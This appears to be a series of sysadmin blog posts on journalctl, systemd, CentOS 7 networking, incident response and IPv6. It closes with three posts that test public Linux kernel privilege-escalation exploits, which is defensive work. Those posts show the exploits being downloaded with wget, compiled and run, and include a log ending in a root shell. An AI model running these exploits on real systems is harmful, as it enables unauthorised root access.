-- Logs begin at Mon 2014-09-01 14:57:19 CEST, end at Mon 2014-09-15 10:52:52 CEST. --
Sep 01 14:57:19 localhost systemd-journal[146]: Runtime journal is using 8.0M (max 2.3G, leaving 3.5G of free 23.4G, current limit 2.3G).
Sep 01 14:57:19 localhost systemd-journal[146]: Runtime journal is using 8.0M (max 2.3G, leaving 3.5G of free 23.4G, current limit 2.3G).
Sep 01 14:57:19 localhost kernel: Initializing cgroup subsys cpuset
Sep 01 14:57:19 localhost kernel: Initializing cgroup subsys cpu
Sep 01 14:57:19 localhost kernel: Initializing cgroup subsys cpuacct
Sep 01 14:57:19 localhost kernel: Linux version 3.10.0-123.6.3.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.2 20140120 (Red Hat 4.8.2-16) (GC
Sep 01 14:57:19 localhost kernel: Command line: BOOT_IMAGE=/vmlinuz-3.10.0-123.6.3.el7.x86_64 root=UUID=bbbbbbbb-7777-465a-993a-888888888888 ro nomodeset rd.a
Sep 01 14:57:19 localhost kernel: e820: BIOS-provided physical RAM map:
...
...
...
Sep 15 10:57:00 foo.example.com sshd[23533]: Received disconnect from 123.123.123.123: 11: disconnected by user
Sep 15 10:57:00 foo.example.com systemd-logind[1161]: Removed session 9773.
Sep 15 10:59:04 foo.example.com sshd[23813]: Accepted publickey for foobar from 132.132.132.132 port 36843 ssh2: RSA 68:68:68:68:68:86:68:68:68:68:68:68:0
Sep 15 10:59:04 foo.example.com systemd[1]: Created slice user-1005.slice.
Sep 15 10:59:04 foo.example.com systemd[1]: Starting Session 9774 of user foobar.
Sep 15 10:59:04 foo.example.com systemd-logind[1161]: New session 9774 of user foobar.
Sep 15 10:59:04 foo.example.com systemd[1]: Started Session 9774 of user foobar.
Sep 15 10:59:04 foo.example.com sshd[23813]: pam_unix(sshd:session): session opened for user foobar by (uid=0)
lines 53881-53917/53917 (END)

As you may have noticed, journalctl shows all the logging from when the system was booted until this moment. There are a lot of lines and data to be interpreted, so you might want to look into the parameters accepted by this application.

If you want to show the most recent log first, give -r; this reverses the ordering so the newest entries come first. If you want to show only the newest ten lines, give -n as a parameter. Example: journalctl -r -n 10

To show how much disk space all these logs take, give --disk-usage. Note that by default the journal is stored in the directory /run/log/journal and not /var/log.

If you want to show only the log from a unit (service), give --unit. Example: journalctl --unit=sshd will show logging for sshd only. Very neat!

Sometimes you just want to inspect a certain range of dates and/or times. You can append the parameters --since and --until. Example: journalctl --since="2014-09-14 01:00:00" --until="2014-09-14 02:00:00" will show all journal entries within that one-hour window. I think this is really good for system monitoring, system support or even for finding traces of a compromised system.

If you want the journal logs to appear in a web interface, you can format the logging into a format the web application supports. As of this writing, journalctl supports the following output formats.

  • short: the default; generates output that is mostly identical to the formatting of classic syslog files, showing one line per journal entry.
  • short-iso: very similar, but shows ISO 8601 wallclock timestamps.
  • short-precise: very similar, but shows timestamps with full microsecond precision.
  • short-monotonic: very similar, but shows monotonic timestamps instead of wallclock timestamps.
  • verbose: shows the full-structured entry items with all fields.
  • export: serializes the journal into a binary (but mostly text-based) stream suitable for backups and network transfer (see Journal Export Format for more information).
  • json: formats entries as JSON data structures, one per line (see Journal JSON Format for more information).
  • json-pretty: formats entries as JSON data structures, but formats them in multiple lines in order to make them more readable for humans.
  • json-sse: formats entries as JSON data structures, but wraps them in a format suitable for Server-Sent Events.
  • cat: generates a very terse output only showing the actual message of each journal entry with no meta data, not even a timestamp.

json is probably the format that comes to mind for displaying the logging in a web interface.
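For example, to hand the latest sshd entries to a web application as JSON:
# journalctl --unit=sshd -n 10 -o json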

There is also a feature known as Forward Secure Sealing, where the log is sealed using a sealing key and can be verified using a verification key. You can check the parameters --setup-keys, --interval, --verify and --verify-key. We won't cover FSS in this article; perhaps sometime in the future I will devote an article to setting it up.

There are also many other good options that help you analyze the log with different strategies, like -b, -p and logical matches, but this article should give you a head start. You can find more information in the journalctl manual.

Friday, September 26, 2014

transition from sysV to systemd, from chkconfig to systemctl

If you have just installed CentOS 7.0 and, as usual, run the chkconfig command to list which services will be started on boot, you will see the following:
[root@localhost ~]# chkconfig

Note: This output shows SysV services only and does not include native
systemd services. SysV configuration data might be overridden by native
systemd configuration.

If you want to list systemd services use 'systemctl list-unit-files'.
To see services enabled on particular target use
'systemctl list-dependencies [target]'.

iprdump 0:off 1:off 2:on 3:on 4:on 5:on 6:off
iprinit 0:off 1:off 2:on 3:on 4:on 5:on 6:off
iprupdate 0:off 1:off 2:on 3:on 4:on 5:on 6:off
network 0:off 1:off 2:on 3:on 4:on 5:on 6:off
tomcat 0:off 1:off 2:off 3:off 4:off 5:off 6:off

That's odd, something has changed. For your information, SysV has been replaced in favor of systemd, and today we are going to learn what systemd is. So what is systemd?

systemd is a system and service manager for Linux, compatible with SysV and LSB init scripts. systemd provides aggressive parallelization capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, keeps track of processes using Linux cgroups, supports snapshotting and restoring of the system state, maintains mount and automount points and implements an elaborate transactional dependency-based service control logic. It can work as a drop-in replacement for sysvinit. 

That is a very lengthy definition. If you are still not so sure, perhaps take a moment to watch a video here.



There is a lot of documentation on google explaining systemd in detail, but this article targets busy people who need a solution right now. If you want more detailed explanations, you should google or read a few of the helpful links below.

So why replace sysV with systemd? What have been improved?

Lennart Poettering and Kay Sievers, the software engineers who initially developed systemd,[1] sought to surpass the efficiency of the init daemon in several ways. They wanted to improve the software framework for expressing dependencies; to allow more processing to be done concurrently or in parallel during system booting; and to reduce the computational overhead of the shell.

Systemd's initialization instructions for each daemon are recorded in a declarative configuration file rather than a shell script. For inter-process communication, systemd makes Unix domain sockets and D-Bus available to the running daemons. Systemd is also capable of aggressive parallelization.

There are several tools to manage systemd.

  • systemctl:
    used to introspect and control the state of the systemd system and service manager

  • systemd-cgls:
    recursively shows the contents of the selected Linux control group hierarchy in a tree

  • systemadm:
    a graphical frontend for the systemd system and service manager that allows introspection and control of systemd. Part of the systemd-gtk package. This is an early version and needs more work. Do not use it for now unless you are a developer.


Below is a table summarizing what you usually did with chkconfig and service, and which systemd command you can use as a replacement.

Sysvinit Command | Systemd Command | Notes
service frobozz start | systemctl start frobozz.service | Used to start a service (not reboot persistent)
service frobozz stop | systemctl stop frobozz.service | Used to stop a service (not reboot persistent)
service frobozz restart | systemctl restart frobozz.service | Used to stop and then start a service
service frobozz reload | systemctl reload frobozz.service | When supported, reloads the config file without interrupting pending operations.
service frobozz condrestart | systemctl condrestart frobozz.service | Restarts if the service is already running.
service frobozz status | systemctl status frobozz.service | Tells whether a service is currently running.
ls /etc/rc.d/init.d/ | systemctl list-unit-files --type=service (preferred), or ls /lib/systemd/system/*.service /etc/systemd/system/*.service | Used to list the services that can be started or stopped, and to list all the services and other units
chkconfig frobozz on | systemctl enable frobozz.service | Turn the service on, for start at next boot, or other trigger.
chkconfig frobozz off | systemctl disable frobozz.service | Turn the service off for the next reboot, or any other trigger.
chkconfig frobozz | systemctl is-enabled frobozz.service | Used to check whether a service is configured to start or not in the current environment.
chkconfig --list | systemctl list-unit-files --type=service (preferred), or ls /etc/systemd/system/*.wants/ | Print a table of services that lists which runlevels each is configured on or off
chkconfig frobozz --list | ls /etc/systemd/system/*.wants/frobozz.service | Used to list what levels this service is configured on or off
chkconfig frobozz --add | systemctl daemon-reload | Used when you create a new service file or modify any configuration
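As a concrete example, assuming an sshd service unit exists on the system, the old chkconfig sshd on and service sshd start/status map to:
# systemctl enable sshd.service
# systemctl start sshd.service
# systemctl status sshd.service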

Runlevels/targets

Systemd has a concept of targets, which serve a similar purpose to runlevels but act a little differently. Each target is named instead of numbered and is intended to serve a specific purpose.

Sysvinit Runlevel | Systemd Target | Notes
0 | runlevel0.target, poweroff.target | Halt the system.
1, s, single | runlevel1.target, rescue.target | Single user mode.
2, 4 | runlevel2.target, runlevel4.target, multi-user.target | User-defined/Site-specific runlevels. By default, identical to 3.
3 | runlevel3.target, multi-user.target | Multi-user, non-graphical. Users can usually login via multiple consoles or via the network.
5 | runlevel5.target, graphical.target | Multi-user, graphical. Usually has all the services of runlevel 3 plus a graphical login.
6 | runlevel6.target, reboot.target | Reboot
emergency | emergency.target | Emergency shell

Below is a summary of the commands you will (hopefully) use.

  • systemctl isolate multi-user.target
    Changes the target/runlevel; this example switches to the equivalent of runlevel 3.

  • systemctl set-default <name of target>.target
    graphical.target is the default. You might want multi-user.target for the equivalent of non graphical (runlevel 3) from sysv init.

  • systemctl get-default
    to show the current target/runlevel


Note, there are several changes you should keep in mind.
* systemd does not use the /etc/inittab file.
* the number of gettys is changed in /etc/systemd/logind.conf.
* unit files are now stored in /usr/lib/systemd/system/

That's it, I hope you get a basic understanding and will be able to start using systemd.

Saturday, September 13, 2014

How to check if Debian Jessie, Ubuntu Trusty or the Nokia N900 is IPv6 ready

With the recent rise of IPv6 usage, it is imperative that we understand whether our devices are ready for IPv6. The Linux kernel has supported IPv6 as early as 1996! Chances are all these distributions are IPv6 ready, but for the sake of being sure and learning the basics, we will check these distributions anyway.

To check, launch a terminal and execute this command as a user.
$ cat /proc/net/if_inet6
fe80000000000000022401fffed782ea 03 40 20 80 eth2
00000000000000000000000000000001 01 80 10 80 lo

You should see output like the above; if you do not, maybe the kernel was not compiled with the ipv6 module. If so, you can load it and check that it is loaded.

# modprobe ipv6
# lsmod | grep ipv6
ipv6 237436 14

You can run the above commands on all the devices mentioned; they are all IPv6 ready.



There are many articles out there about disabling IPv6, but with the depletion of IPv4 addresses, I think this practice should not continue; be ready and prepared for IPv6 instead. Of course, unless you have a good reason not to use it.

Friday, September 12, 2014

Understand basic network configuration in CentOS 7

With the recent release of CentOS7, today we are going to check out the basic network configuration. My usual quick command, ifconfig.
[root@localhost ~]# ifconfig
-bash: ifconfig: command not found

It seems ifconfig is no longer there; note that if you upgrade from centos 6.x, you should be aware of this. If you are going to configure network interfaces, start getting familiar with the ip command (see the examples below). If you really want the ifconfig command, you can still install the net-tools package.
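A few ip equivalents of the old commands, for reference:
# ip addr show          <- list interfaces and addresses (roughly ifconfig -a)
# ip link set eth0 up   <- bring an interface up (ifconfig eth0 up)
# ip route show         <- show the routing table (route -n)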

Let's restart network interface.
[root@centos7-test1 network-scripts]# service network restart
Restarting network (via systemctl): [ OK ]
[root@centos7-test1 network-scripts]# service network status
Configured devices:
lo eth0
Currently active devices:
lo eth0
[root@centos7-test1 init.d]# systemctl restart network
[root@centos7-test1 init.d]# systemctl status network
network.service - LSB: Bring up/down networking
Loaded: loaded (/etc/rc.d/init.d/network)
Active: active (exited) since Tue 2014-07-15 14:33:28 CEST; 13s ago
Process: 11597 ExecStop=/etc/rc.d/init.d/network stop (code=exited, status=0/SUCCESS)
Process: 11753 ExecStart=/etc/rc.d/init.d/network start (code=exited, status=0/SUCCESS)

Jul 15 14:33:27 centos7-test1 network[11753]: Bringing up loopback interface: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:27 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:27 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:28 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:28 centos7-test1 network[11753]: [ OK ]
Jul 15 14:33:28 centos7-test1 network[11753]: Bringing up interface eth0: Connection successfully activated (D-Bus active path: /org/...tion/3)
Jul 15 14:33:28 centos7-test1 network[11753]: [ OK ]
Jul 15 14:33:28 centos7-test1 systemd[1]: Started LSB: Bring up/down networking.
Hint: Some lines were ellipsized, use -l to show in full.

Notice that service management is now done via systemctl; CentOS 7 uses systemd in place of SysV. Also notice that the configuration file ifcfg-lo could not be loaded? This issue has been filed here.

Upstream has changed the default: the networking service is now provided by NetworkManager, which is a dynamic network control and configuration daemon that attempts to keep network devices and connections up and active when they are available.

If it is not installed for some reason (which should not happen, because it comes with the default installation), you can follow these commands:
# # install it
# yum install NetworkManager
# # ensure network manager service is started everything system boot up.
# systemctl enable NetworkManager
# # manual start for now.
# systemctl start NetworkManager
# # check the status.
[root@centos7-test1 ~]# systemctl status NetworkManager
NetworkManager.service - Network Manager
Loaded: loaded (/usr/lib/systemd/system/NetworkManager.service; enabled)
Active: active (running) since Tue 2014-07-15 13:39:18 CEST; 3h 40min ago
Main PID: 679 (NetworkManager)
CGroup: /system.slice/NetworkManager.service
├─ 679 /usr/sbin/NetworkManager --no-daemon
└─11896 /sbin/dhclient -d -sf /usr/libexec/nm-dhcp-helper -pf /var/run/dhclient-eth0.pid -lf /var/lib/NetworkManager/dhclient-55911be2-9763-471f...

Jul 15 17:05:21 centos7-test1 NetworkManager[679]: bound to 192.168.0.116 -- renewal in 3581 seconds.
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> (eth0): DHCPv4 state changed renew -> renew
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> address 192.168.0.116
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> plen 24 (255.255.255.0)
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> gateway 192.168.0.1
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> server identifier 192.168.0.1
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> lease time 7200
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> nameserver '192.168.0.1'
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> nameserver '8.8.8.8'
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> domain name 'PowerRanger'

If you are configuring manually over a remote session, you can use the nmtui command; nmtui is a simple curses-based text user interface. But if you want to configure interfaces from a script, it is better to use the ip or nmcli commands (see the examples below). For more information, you can read here.
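A couple of read-only nmcli commands to get started with, safe to run over a remote session:
# nmcli device status        <- list devices and their connection state
# nmcli connection show      <- list the configured connections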

That's it for this article. I would like to thank my buddy for being kind enough to let me ssh in and study centos 7 on his host. :) you know who you are! dankeschon!

Saturday, August 30, 2014

What should you do if the server you administer got hacked?

If you realize that your server has been compromised, this discovery will create confusion and reduce confidence, and if the server is serving user requests, you will have to declare downtime. That's not good.

In order to restore service as quickly as possible, it is best to have a replacement server ready to swap in instantly, so that you can reduce the noise from customers. But in order to prevent such an attack in the future, you must at least identify how it happened and take countermeasures.

In this article, we will learn how to investigate the compromise and then take countermeasures.

Quick solution.

Probably the quickest solution is to format and reinstall the operating system together with the applications that serve user requests. This is reasonable if you do not have a backup server and you want the server to serve user requests again as soon as possible. But it does not solve the actual problem of how the hack took place, so it might happen again in the near future.

Long and workable solution.

  1. identify your own custom application deployed and start to investigate from there.

  2. update the system using package manager and restart system.

  3. tighten up security


identify your own custom application deployed and start to investigate from there.

Because open source software is mostly well tested and updated often, the first place to investigate is usually your own application. Hence, you must have a good understanding of your app so that you can quickly identify the source of the problem.

Following are a set of commands which might help you in your investigation.

  • w
    who is on the server

  • sudo netstat -nalp | grep ":22"
    change 22 to the port your application listens on. Check if there is anything abnormal.

  • if your custom applications are built on open source components, check their logs as well, since attackers will often find exploits for popular open source software and target those.


update the system using package manager and restart system.

First, you can start by checking:

  • last
    check recent logins for anything unexpected or invalid.

  • cat /var/log/secure* | grep Accept
    check for accepted logins that should not have happened.

  • ps -elf
    check if any malware process is running; if you spot one, find where it runs from and delete all the malware files.

  • ls /tmp /var/tmp /dev/shm -la
    these directories normally allow any process to write into them, so you might want to check for any fishy files here.

  • file <filename>
    check what type a suspicious file really is.

  • cat /etc/passwd
    check if there are unknown entries which are not supposed to be there.

  • sudo netstat -plant |awk ' /^tcp/ {split($7, a, "/"); print $6, a[2]}' |sort | uniq -c | sort -n| tail
    4 ESTABLISHED java
    4 LISTEN kadmind
    5 LISTEN java
    5 LISTEN python
    6 ESTABLISHED python
    if your server has been compromised and turned into a ddos bot, the malware will probably be launching a lot of traffic; with this command you should be able to identify whether the tcp connection count has spiked.

  • sudo netstat -plant | awk '$4 ~ /:22$/ {print $5}' | cut -f1 -d: | sort | uniq -c | sort -n
    1
    1 0.0.0.0
    2 192.168.0.2
    check the total connections established to your server on port 22.

  • sudo netstat -plant | awk '/^tcp/ {print $6}' | sort | uniq -c | sort -n
    2 CLOSING
    4 SYN_RECV
    5 LAST_ACK
    6 FIN_WAIT1
    12 LISTEN
    13 FIN_WAIT2
    344 TIME_WAIT
    977 ESTABLISHED
    check the network connection states; this is good information should your server suddenly spike in ESTABLISHED or SYN states. If there is any spike, you will know something may have gone fishy.

  • $HOME/.bash_history
    check every user's bash_history to see if there is anything suspect. If the server application runs under its own user id, especially check the bash_history in that user's home directory.

  • find / -mtime -5
    find which files have been changed within the last 5 days.


If nothing is found, just update the system packages using the package manager and reboot the system.

tighten up security and monitor

If you have a loose firewall policy (iptables or a hardware firewall), you should review and tighten it.

To prevent a recurrence, you could also set up monitoring that notifies you when the TCP connection count exceeds a threshold or suddenly spikes; a minimal sketch is shown below.
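As one possible approach, a small script run from cron can count ESTABLISHED connections and alert when they cross a limit. This is only a sketch under assumptions: the threshold (500) and the alert address (admin@example.com) are placeholders, and it assumes a working local mail command.

#!/bin/sh
# conn-alert.sh - alert when ESTABLISHED TCP connections exceed a threshold (sketch only)
THRESHOLD=500                    # assumption: tune this to your normal traffic level
ALERT_EMAIL="admin@example.com"  # assumption: replace with your own address

COUNT=$(netstat -ant | awk '$6 == "ESTABLISHED"' | wc -l)

if [ "$COUNT" -gt "$THRESHOLD" ]; then
  echo "$(hostname): $COUNT ESTABLISHED connections (threshold $THRESHOLD)" \
    | mail -s "TCP connection spike on $(hostname)" "$ALERT_EMAIL"
fi

# assumption: schedule it every few minutes, e.g. in crontab:
# */5 * * * * /usr/local/bin/conn-alert.sh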

 

Whilst these steps are not exhaustive, as attackers always come up with different types of attacks, you should be prepared and stay alert. Gather information using Google as well.

Sunday, August 17, 2014

CVE-2009-2692 Linux NULL pointer dereference due to incorrect proto_ops initializations

Again, as with previous CVE posts, I would like to state that the intention of this article is to protect and safeguard administrators and developers who make a living by maintaining computer systems for companies. This post is to make those who run the Linux operating system aware of this issue so that they can protect against malicious attacks. I take no responsibility if you, or anyone with evil intent, use this to damage others.

This source (or you can download the original source here) is written in C and requires some level of understanding of the Linux system as well. You can find explanations for the source exploit.c here, here or here. As explained in the documentation, this exploit mainly targets these kernel versions:

  • kernel 2.6.0 to 2.6.30.4

  • kernel 2.4.4 to 2.4.37.4


So check whether your server's kernel falls within these ranges and perform a kernel update if it does, as a fix is already available; a quick check sketch is shown below.
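As a rough first check (not a substitute for your distribution's security advisories), you can compare the running kernel against the affected ranges and confirm that vm.mmap_min_addr is non-zero, since the published exploit relies on mapping page zero. The following is only a sketch; the version test is deliberately coarse, and vendor kernels often backport the fix without changing the version string.

#!/bin/sh
# cve-2009-2692-check.sh - rough check only, not a proof of (in)vulnerability
KERNEL=$(uname -r)
MINADDR=$(cat /proc/sys/vm/mmap_min_addr 2>/dev/null)

echo "running kernel : $KERNEL"
echo "mmap_min_addr  : ${MINADDR:-unknown}"

case "$KERNEL" in
  2.6.*|2.4.*)
    echo "kernel is in the 2.4/2.6 series - verify it against the affected ranges"
    echo "(2.6.0 to 2.6.30.4, 2.4.4 to 2.4.37.4) and your vendor's patch status." ;;
  *)
    echo "kernel is outside the affected series." ;;
esac

if [ "${MINADDR:-0}" -eq 0 ]; then
  echo "warning: mmap_min_addr is 0, so mapping page zero is not blocked."
fi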

According to the CVE, the description of this exploit is:

The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage function) on a PF_PPPOX socket.

Okay, let's download the source and try it.
user@localhost:~/Desktop/exploit/wunderbar_emporium$ whoami
user
user@localhost:~/Desktop/exploit/wunderbar_emporium$ sh -x wunderbar_emporium.sh
++ pwd
++ sed 's/\//\\\//g'
+ ESCAPED_PWD='\/home\/user\/Desktop\/exploit\/wunderbar_emporium'
+ sed 's/\/home\/spender/\/home\/user\/Desktop\/exploit\/wunderbar_emporium/g' pwnkernel.c
+ mv pwnkernel.c pwnkernel2.c
+ mv pwnkernel1.c pwnkernel.c
+ killall -9 pulseaudio
++ uname -p
+ IS_64=unknown
+ OPT_FLAG=
+ '[' unknown = x86_64 ']'
++ cat /proc/sys/vm/mmap_min_addr
+ MINADDR=65536
+ '[' 65536 = '' -o 65536 = 0 ']'
+ '[' '!' -f /usr/sbin/getenforce ']'
+ cc -fno-stack-protector -fPIC -shared -o exploit.so exploit.c
+ cc -o pwnkernel pwnkernel.c
+ ./pwnkernel
[+] Personality set to: PER_SVR4
Pulseaudio is not suid root!
+ mv -f pwnkernel2.c pwnkernel.c
user@localhost:~/Desktop/exploit/wunderbar_emporium$ whoami
user

So this server is not vulnerable to this exploit! All good.

Friday, August 15, 2014

information for malware Linux_time_y_2014 and Linux_time_y_2015 is needed

This article is a bit special: it is more about seeking information and documenting it. If you have this type of information, please leave a comment below.

If you have noticed that any of the following files exist on your system:

  • Linux_time_y_2014

  • Linux_time_y_2015 or xudp

  • .E7739C9DFEAC5B8A69A114E45AB327D41 or mysql1.0

  • .E7739C9DFEAC5B8A69A114E45AB327D4 or mysql1s


then this is malware; if it has been uploaded or copied to your server, you should check whether it is running on the system and remove it if it is. A hedged check sketch is shown below.
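As a hedged sketch only (the file names come straight from the list above; the search locations are my own assumptions), you could look for these names on disk and in the process list:

#!/bin/sh
# malware-lookup.sh - search for the file names listed above (sketch only)
NAMES="Linux_time_y_2014 Linux_time_y_2015 xudp .E7739C9DFEAC5B8A69A114E45AB327D41 mysql1.0 .E7739C9DFEAC5B8A69A114E45AB327D4 mysql1s"

for name in $NAMES; do
  echo "== $name =="
  # look in the root filesystem plus the usual world-writable drop locations
  find / /tmp /var/tmp /dev/shm -xdev -name "$name" 2>/dev/null
  # check whether anything with that name is currently running
  ps -elf | grep -F "$name" | grep -v grep
done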

I googled and searched social sites, but there is not much information other than identifying this as malware. If you happen to know which CVE it relates to or where the source is, please kindly leave a message in the comments.

The intention is to understand what this malware does other than launching DDoS attacks, to document it here, and to provide information to others who seek it. If you know how to dissect this binary and analyze its contents, please do share as well.

Thank you.

Sunday, August 3, 2014

CVE-2014-0196 kernel: pty layer race condition leading to memory corruption

First off, I would like to state that the intention of this article is to protect and safeguard administrators and developers who make a living by maintaining computer systems for companies. This post is to make those who run the Linux operating system aware of this issue so that they can protect against malicious attacks. I take no responsibility if you, or anyone with evil intent, use this to damage others.

This source is written in C and requires some level of understanding of the Linux system as well. You can find an explanation for the source cve-2014-0196-md.c here. If you run an old system, then you might want to read further. But also check the kernel that comes with your distribution; the fix may already have been backported, and a quick check sketch is shown below.
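A quick, hedged way to check whether your distribution has already backported the fix is to look for the CVE id in the kernel package changelog. The following is only a sketch; the commands and the Debian changelog path are assumptions about typical RPM-based and Debian/Ubuntu layouts, and a missing changelog entry does not by itself prove you are vulnerable.

#!/bin/sh
# cve-2014-0196-fix-check.sh - rough check for a backported fix (sketch only)
echo "running kernel: $(uname -r)"

if command -v rpm >/dev/null 2>&1; then
  # RPM-based systems (RHEL/CentOS/Fedora)
  rpm -q --changelog kernel | grep -i CVE-2014-0196
elif [ -r "/usr/share/doc/linux-image-$(uname -r)/changelog.Debian.gz" ]; then
  # Debian/Ubuntu: changelog shipped with the kernel image package (path is an assumption)
  zgrep -i CVE-2014-0196 "/usr/share/doc/linux-image-$(uname -r)/changelog.Debian.gz"
fi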

From the description:

The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings.

Okay, let's move on to compile and test it out.
user@localhost:~$ wget -O cve-2014-0196-md.c http://bugfuzz.com/stuff/cve-2014-0196-md.c
user@localhost:~$ gcc cve-2014-0196-md.c -lutil -lpthread
user@localhost:~$ ./a.out
[+] Resolving symbols
[+] Resolved commit_creds: 0xffffffff8105bb28
[+] Resolved prepare_kernel_cred: 0xffffffff8105bd3b
[+] Doing once-off allocations
[+] Attempting to overflow into a tty_struct......
........................................................................................................................................................................................................................................................................................................................................................................................................................^C

Apparently this kernel is not vulnerable to this exploit. Another great day. :-)

Friday, July 25, 2014

CVE-2010-3081 Ac1dB1tch3z

First off, I would like to state that the intention of this article is to protect and safeguard administrators and developers who make a living by maintaining computer systems for companies. This post is to make those who run the Linux operating system aware of this issue so that they can protect against malicious attacks. I take no responsibility if you, or anyone with evil intent, use this to damage others.

This exploit is only effective against kernel versions 2.6.26-rc1 to 2.6.36-rc4, so be alert if your production servers are running these kernels. It has since been fixed upstream, as can be found here. A quick check sketch is shown below.
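Since the bug lives in the 32-bit compatibility layer on 64-bit kernels, a rough first check is to look at the running kernel version and whether 32-bit emulation is compiled in. The following is only a sketch; the config file path assumes a typical distribution layout, and vendor kernels in that range may already carry a backported fix.

#!/bin/sh
# cve-2010-3081-check.sh - rough check only, not a proof of (in)vulnerability
KERNEL=$(uname -r)
CONFIG="/boot/config-$(uname -r)"   # assumption: usual location of the kernel config

echo "running kernel: $KERNEL (affected upstream range: 2.6.26-rc1 to 2.6.36-rc4)"

if [ -r "$CONFIG" ]; then
  # the exploit goes through the 32-bit compat syscall path on x86_64 kernels
  grep CONFIG_IA32_EMULATION "$CONFIG"
else
  echo "kernel config not found at $CONFIG - check your distribution's advisory instead"
fi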

So what is this exploit about?

A vulnerability in the 32-bit compatibility layer for 64-bit systems was reported. It is caused by insecure allocation of user space memory when translating system call inputs to 64-bit. A stack pointer underflow can occur when using the "compat_alloc_user_space" method inside arch/x86/include/asm/compat.h with an arbitrary length input.

Or read the longer descriptions here and here.

Get the source here and compile it.
user@localhost:~$ gcc -m32 15024.c -o 15024
user@localhost:~$ ./15024
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
!!! Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!

If the kernel is vulnerable to this exploit, the output looks like the example below.
[bob@xxx ~]$ date
Sun Sep 19 18:22:38 BRT 2010
[bob@xxx ~]$ cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
[bob@xxx ~]$ uname -a
Linux xxx 2.6.18-194.11.3.el5 #1 SMP Mon Aug 23 15:51:38 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
[bob@xxx ~]$ id
uid=500(bob) gid=500(bob) groups=500(bob)
[bob@xxx ~]$ ./15024
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.11.3.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# id
uid=0(root) gid=500(bob) groups=500(bob)

That's it! Stay safe.